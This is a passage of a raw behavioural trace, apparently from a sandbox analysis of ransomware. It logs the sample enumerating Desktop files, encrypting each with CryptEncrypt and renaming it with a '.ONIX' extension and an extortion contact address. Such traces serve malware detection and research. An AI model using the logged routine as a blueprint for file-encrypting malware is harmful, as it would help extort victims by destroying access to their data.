HALPmcxz\\Desktop\\iMm3wfE9h dqRHKDhyw.doc", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iMm3wfE9h dqRHKDhyw.doc.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iMm3wfE9h dqRHKDhyw.doc.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.370] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=24182) returned 1 [0120.370] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x5e76 [0120.371] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.371] GetProcessHeap () returned 0x410000 [0120.371] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8b80 [0120.371] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.373] WriteFile (in: hFile=0x4a4, lpBuffer=0x4d8b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.374] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.375] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.376] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5e76) returned 0x4dab68 [0120.376] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5e76) returned 0x4e09e8 [0120.376] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.376] ReadFile (in: hFile=0x4a4, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x5e76, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x5e76, lpOverlapped=0x0) returned 1 [0120.377] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-24182, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.377] WriteFile (in: hFile=0x4a4, lpBuffer=0x4e09e8*, nNumberOfBytesToWrite=0x5e76, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e09e8*, lpNumberOfBytesWritten=0x367f44c*=0x5e76, lpOverlapped=0x0) returned 1 [0120.378] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4dab68 | out: hHeap=0x410000) returned 1 [0120.378] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4e09e8 | out: hHeap=0x410000) returned 1 [0120.378] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x5e76, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.378] CloseHandle (hObject=0x4a4) returned 1 [0120.379] GetProcessHeap () returned 0x410000 [0120.379] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b80 | out: hHeap=0x410000) returned 1 [0120.379] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iMm3wfE9h dqRHKDhyw.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\imm3wfe9h dqrhkdhyw.doc"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iMm3wfE9h dqRHKDhyw.doc.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\imm3wfe9h dqrhkdhyw.doc.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.382] GetProcessHeap () returned 0x410000 [0120.382] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0120.382] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.382] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.382] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0120.382] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e5435d0, ftCreationTime.dwHighDateTime=0x1d5dac6, ftLastAccessTime.dwLowDateTime=0x76f71fc0, ftLastAccessTime.dwHighDateTime=0x1d5e68a, ftLastWriteTime.dwLowDateTime=0x76f71fc0, ftLastWriteTime.dwHighDateTime=0x1d5e68a, nFileSizeHigh=0x0, nFileSizeLow=0x6033, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IuiQXilG.bmp", cAlternateFileName="")) returned 1 [0120.382] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.382] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.382] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.382] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.382] GetLastError () returned 0x0 [0120.382] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuiQXilG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iuiqxilg.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.382] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.382] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x6033, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.382] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.382] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.383] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.383] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.383] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.383] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.383] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuiQXilG.bmp", dwFileAttributes=0x80) returned 1 [0120.384] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuiQXilG.bmp") returned 51 [0120.384] GetProcessHeap () returned 0x410000 [0120.384] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd6) returned 0x460008 [0120.384] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuiQXilG.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuiQXilG.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuiQXilG.bmp" [0120.384] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuiQXilG.bmp", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuiQXilG.bmp.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuiQXilG.bmp.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.384] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=24627) returned 1 [0120.384] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x6033 [0120.384] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.384] GetProcessHeap () returned 0x410000 [0120.384] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8b80 [0120.384] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.384] WriteFile (in: hFile=0x4a4, lpBuffer=0x4d8b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.386] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.387] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.388] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6033) returned 0x4dab68 [0120.388] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6033) returned 0x4e0ba8 [0120.388] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.388] ReadFile (in: hFile=0x4a4, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x6033, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x6033, lpOverlapped=0x0) returned 1 [0120.388] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-24627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.388] WriteFile (in: hFile=0x4a4, lpBuffer=0x4e0ba8*, nNumberOfBytesToWrite=0x6033, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e0ba8*, lpNumberOfBytesWritten=0x367f44c*=0x6033, lpOverlapped=0x0) returned 1 [0120.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4dab68 | out: hHeap=0x410000) returned 1 [0120.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4e0ba8 | out: hHeap=0x410000) returned 1 [0120.390] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x6033, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.390] CloseHandle (hObject=0x4a4) returned 1 [0120.391] GetProcessHeap () returned 0x410000 [0120.391] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b80 | out: hHeap=0x410000) returned 1 [0120.391] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuiQXilG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iuiqxilg.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IuiQXilG.bmp.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iuiqxilg.bmp.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.393] GetProcessHeap () returned 0x410000 [0120.393] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.393] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.393] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca55fe60, ftCreationTime.dwHighDateTime=0x1d5d8f8, ftLastAccessTime.dwLowDateTime=0x7ebfc940, ftLastAccessTime.dwHighDateTime=0x1d5e019, ftLastWriteTime.dwLowDateTime=0x7ebfc940, ftLastWriteTime.dwHighDateTime=0x1d5e019, nFileSizeHigh=0x0, nFileSizeLow=0x7565, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jlQTSqZyTpCa.gif", cAlternateFileName="JLQTSQ~1.GIF")) returned 1 [0120.393] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jlQTSqZyTpCa.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jlqtsqzytpca.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.393] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.393] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x7565, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.394] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.394] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.394] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.394] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.395] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.395] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.395] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jlQTSqZyTpCa.gif", dwFileAttributes=0x80) returned 1 [0120.395] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jlQTSqZyTpCa.gif") returned 55 [0120.395] GetProcessHeap () returned 0x410000 [0120.395] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x460008 [0120.395] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jlQTSqZyTpCa.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jlQTSqZyTpCa.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jlQTSqZyTpCa.gif" [0120.395] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jlQTSqZyTpCa.gif", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jlQTSqZyTpCa.gif.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jlQTSqZyTpCa.gif.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.395] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=30053) returned 1 [0120.395] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x7565 [0120.395] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.395] GetProcessHeap () returned 0x410000 [0120.395] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8b80 [0120.395] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.395] WriteFile (in: hFile=0x4a4, lpBuffer=0x4d8b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.397] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.398] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.399] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7565) returned 0x4dab68 [0120.399] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7565) returned 0x4e20d8 [0120.399] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.399] ReadFile (in: hFile=0x4a4, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x7565, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x7565, lpOverlapped=0x0) returned 1 [0120.400] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-30053, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.400] WriteFile (in: hFile=0x4a4, lpBuffer=0x4e20d8*, nNumberOfBytesToWrite=0x7565, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e20d8*, lpNumberOfBytesWritten=0x367f44c*=0x7565, lpOverlapped=0x0) returned 1 [0120.401] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x7565, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.401] CloseHandle (hObject=0x4a4) returned 1 [0120.402] GetProcessHeap () returned 0x410000 [0120.402] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b80 | out: hHeap=0x410000) returned 1 [0120.402] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jlQTSqZyTpCa.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jlqtsqzytpca.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jlQTSqZyTpCa.gif.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jlqtsqzytpca.gif.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.414] GetProcessHeap () returned 0x410000 [0120.414] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.414] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f5c3c00, ftCreationTime.dwHighDateTime=0x1d5e31b, ftLastAccessTime.dwLowDateTime=0x8ff53e30, ftLastAccessTime.dwHighDateTime=0x1d5e2c0, ftLastWriteTime.dwLowDateTime=0x8ff53e30, ftLastWriteTime.dwHighDateTime=0x1d5e2c0, nFileSizeHigh=0x0, nFileSizeLow=0x9cdb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pc4n.flv", cAlternateFileName="")) returned 1 [0120.414] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pc4n.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pc4n.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.414] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.414] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x9cdb, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.414] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.414] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.415] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.415] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.415] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.415] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.415] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pc4n.flv", dwFileAttributes=0x80) returned 1 [0120.416] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pc4n.flv") returned 47 [0120.416] GetProcessHeap () returned 0x410000 [0120.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xce) returned 0x477600 [0120.416] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pc4n.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pc4n.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pc4n.flv" [0120.416] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pc4n.flv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pc4n.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pc4n.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.416] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=40155) returned 1 [0120.416] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x9cdb [0120.416] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.416] GetProcessHeap () returned 0x410000 [0120.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8b80 [0120.416] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.416] WriteFile (in: hFile=0x4a4, lpBuffer=0x4d8b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.418] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.419] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.420] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x9cdb) returned 0x4dab68 [0120.420] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x9cdb) returned 0xf50048 [0120.421] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.421] ReadFile (in: hFile=0x4a4, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x9cdb, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x9cdb, lpOverlapped=0x0) returned 1 [0120.422] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-40155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.422] WriteFile (in: hFile=0x4a4, lpBuffer=0xf50048*, nNumberOfBytesToWrite=0x9cdb, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesWritten=0x367f44c*=0x9cdb, lpOverlapped=0x0) returned 1 [0120.424] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, 